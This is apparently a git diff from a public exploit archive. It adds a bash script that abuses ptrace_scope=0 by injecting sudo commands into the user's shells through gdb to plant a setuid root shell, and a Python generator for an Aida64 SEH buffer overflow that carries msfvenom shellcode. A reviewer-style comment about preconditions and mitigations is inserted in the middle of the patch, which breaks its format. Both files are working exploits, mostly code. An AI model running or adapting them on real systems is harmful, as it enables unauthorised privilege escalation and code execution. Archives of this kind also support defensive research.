diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh
index 169b793f5..b00215e3a 100755
--- a/exploits/linux/local/40953.sh
+++ b/exploits/linux/local/40953.sh
@@ -2,7 +2,7 @@
 #
 # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
 # Google Dork: vesta control panel inurl:8083
-# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker
+# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
 # Vendor Homepage: http://vestacp.com/
 # Software Link: https://github.com/serghey-rodin/vesta
 # Version: 0.9.7 - 0.9.8-16
diff --git a/exploits/linux/local/46989.sh b/exploits/linux/local/46989.sh
new file mode 100755
index 000000000..cd5d8f395
--- /dev/null
+++ b/exploits/linux/local/46989.sh
@@ -0,0 +1,96 @@
+#!/usr/bin/env bash
+
+#######################################################
+# #
+# 'ptrace_scope' misconfiguration #
+# Local Privilege Escalation #
+# #
+#######################################################
+
+# Affected operating systems (TESTED):
+# Parrot Home/Workstation 4.6 (Latest Version)
+# Parrot Security 4.6 (Latest Version)
+# CentOS / RedHat 7.6 (Latest Version)
+# Kali Linux 2018.4 (Latest Version)
+
+# Authors: Marcelo Vazquez (s4vitar)
+# Victor Lasa (vowkin)
+
+#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
+#└──╼ $./exploit.sh
+#
+#[*] Checking if 'ptrace_scope' is set to 0... [√]
+#[*] Checking if 'GDB' is installed... [√]
+#[*] System seems vulnerable! [√]
+#
+#[*] Starting attack...
+#[*] PID -> sh
+#[*] Path 824: /home/s4vitar
+#[*] PID -> bash
+#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> sh
+#[*] Path
+#[*] PID -> bash
+#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
+#[*] PID -> bash
+#[*] Path 1842: /home/s4vitar
+#[*] PID -> bash
+#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
+#[*] PID -> bash
+#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
+#
+#[*] Cleaning up... [√]
+#[*] Spawning root shell... [√]
+#
+#bash-4.4# whoami
+#root
+#bash-4.4# id
+#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
+#bash-4.4#
+
+
+function startAttack(){
+ tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
+ if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
+ echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
+ echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
+ fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
+ done
+
+ if [ -f /tmp/bash ]; then
+ /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
+ rm /tmp/bash
+ echo -e " [√]"
+ echo -ne "[*] Spawning root shell..."
+ echo -e " [√]\n"
+ tput cnorm && bash -p'
+ else
+ echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]"
+ fi
+}
+
+echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
+if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
+ echo " [√]"
+ echo -ne "[*] Checking if 'GDB' is installed..."
+ if command -v gdb >/dev/null 2>&1; then
+ echo -e " [√]"
+ echo -e "[*] System seems vulnerable! [√]\n"
+ echo -e "[*] Starting attack..."
+
+ startAttack
+
+ else
+ echo " [✗]"
+ echo "[*] System is NOT vulnerable :( [✗]"
+ fi
+else
+ echo " [✗]"
+ echo "[*] System is NOT vulnerable :( [✗]"
+fi; tput cnorm
\ No newline at end of file
diff --git a/exploits/windows/local/46991.py b/exploits/windows/local/46991.py
new file mode 100755
index 000000000..51e0694a2
--- /dev/null
+++ b/exploits/windows/local/46991.py
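Review bot: The header blames `ptrace_scope` alone, but the command fed to gdb for every attached shell is `echo | sudo -S cp /bin/bash /tmp ... && echo | sudo -S chmod +s /tmp/bash`, which only succeeds if that shell can run sudo without a real password (presumably a still-valid sudo timestamp or a NOPASSWD rule), so the real precondition and the matching hardening are missing from the comment block. I would add `# Precondition: kernel.yama.ptrace_scope=0 AND a same-user shell that can already run sudo non-interactively (cached timestamp / NOPASSWD)` and `# Mitigation: sysctl kernel.yama.ptrace_scope=1 or higher; sudoers Defaults timestamp_timeout=0`. It is also worth stating in the header that the setuid copy at `/tmp/bash` is only removed inside the `/tmp/bash -p -c '...'` command string, so an interrupted run leaves that artifact on disk — which is exactly what a responder should look for after a suspected run. The "NOT vulnerable" message after `grep -q "0" < /proc/sys/kernel/yama/ptrace_scope` is printed on any grep failure, so the header should say the check only reflects the Yama value it could read.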
@@ -0,0 +1,55 @@
+#!/usr/bin/python
+##########################################################################################################
+# Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit
+# Author : Nipun Jaswal
+# Tested On : Windows 7 Home Basic(x86)
+# Version : 6.00.5100
+# Release Date : 31/May/2019
+# Build : 21/May/2019
+# Vendor Homepage: https://www.aida64.com/downloads
+# Software Link: https://www.aida64.com/products/aida64-engineer
+# CVE : CVE-2019-
+
+##########################################################################################################
+##################################Steps to Reproduce######################################################
+#1) Open Aida64 Engineer
+#2) Navigate to File-> Preferences
+#3) Logging --> 'Log Sensor Reading to CSV log File'
+#4) Paste the Content from exploit.txt to the 'Log Sensor Reading to CSV log File' field
+#5) Press Apply-> OK
+#6) Exit the Application via File-->Exit
+##########################################//SHELLCODE//###################################################
+# msfvenom -p windows/messagebox TEXT=NIPUN-NIPUN -b '\x00\x0a\x0d' -f py --smallest
+buf = ""
+buf += "\xb8\xb6\xf7\x5f\x31\xda\xd5\xd9\x74\x24\xf4\x5f\x2b"
+buf += "\xc9\xb1\x42\x31\x47\x14\x83\xef\xfc\x03\x47\x10\x54"
+buf += "\x02\x86\xda\x03\x34\x4d\x39\xc7\xf6\x7c\xf3\x50\xc8"
+buf += "\x49\x90\x15\x5b\x7a\xd2\x5f\x90\xf1\x92\x83\x23\x43"
+buf += "\x53\x30\x4d\x6c\xe8\x70\x8a\x23\xf6\x09\x19\xe2\x07"
+buf += "\x20\x22\xf4\x68\x49\xb1\xd3\x4c\xc6\x0f\x20\x06\x8c"
+buf += "\xa7\x20\x19\xc6\x33\x9a\x01\x9d\x1e\x3b\x33\x4a\x7d"
+buf += "\x0f\x7a\x07\xb6\xfb\x7d\xf9\x86\x04\x4c\xc5\x15\x56"
+buf += "\x2b\x05\x91\xa0\xf5\x4a\x57\xae\x32\xbf\x9c\x8b\xc0"
+buf += "\x1b\x75\x99\xd9\xe8\xdf\x45\x1b\x05\xb9\x0e\x17\x92"
+buf += "\xcd\x4b\x34\x25\x39\xe0\x40\xae\xbc\x1f\xc1\xf4\x9a"
+buf += "\xc3\xb3\x37\x50\xf3\x1a\x63\x1c\xe1\xd4\x49\x77\x64"
+buf += "\xa8\x43\x64\x2a\xdd\xc4\x8b\x34\xe2\x73\x36\xcf\xa6"
+buf += "\xfd\x61\x2d\xab\x86\x8e\x96\x1e\x60\x20\x29\x61\x8f"
+buf += "\xb4\x93\x96\x07\xab\x77\x87\x96\x5b\xbb\xf5\x36\xf8"
+buf += "\xd3\x8c\x35\x65\x56\x5f\x62\xed\xca\xbb\x9e\x67\x14"
+buf += "\x95\x61\x22\xdd\x93\x5f\x9d\x66\x0b\xfd\x53\x25\xcb"
+buf += "\x1d\x48\x07\x3c\x42\x6f\x58\x43\x14\xe0\xdf\xe4\xc4"
+buf += "\x96\x7e\x72\x61\x25\xe9\x31\x0c\xda\x9a\xf8\x15\x94"
+buf += "\x01\xdf\xa3\x2c\x5a\x77\xe3\x7b\xd3\xd0\x6b\xca\xc6"
+buf += "\xae\x22\xba\x56\x66\xe4\x6f\x56\xb1\x8c\xdc\xbc\x4a"
+buf += "\x05\x3d\x8d\x9e\x47\xed\xbf\x4c\x98\xc1\x71\xb1\x36"
+
+##########################################//SHELLCODE//###################################################
+junk= "\x41" * (1106 - len(buf))
+seh = "\x87\xe2\x1d\x01" #0x011de287 - [aida64.exe]
+nseh = "\xeb\xf8\x90\x90"
+buffer = junk + buf +"\xe9\xdd\xfe\xff\xff\xcc" + nseh + seh
+handle = open("exploit.txt","w")
+handle.write(buffer)
+handle.close()
+##########################################//END//#########################################################
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index adcf439a5..e5a6c09e5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10545,6 +10545,8 @@ id,file,description,date,author,type,platform,port
 46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows,
 46978,exploits/linux/local/46978.sh,"Ubuntu 18.04 - 'lxd' Privilege Escalation",2019-06-10,s4vitar,local,linux,
 46988,exploits/windows/local/46988.txt,"Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation",2019-06-13,PovlTekstTV,local,windows,
+46989,exploits/linux/local/46989.sh,"CentOS 7.6 - 'ptrace_scope' Privilege Escalation",2019-06-14,s4vitar,local,linux,
+46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139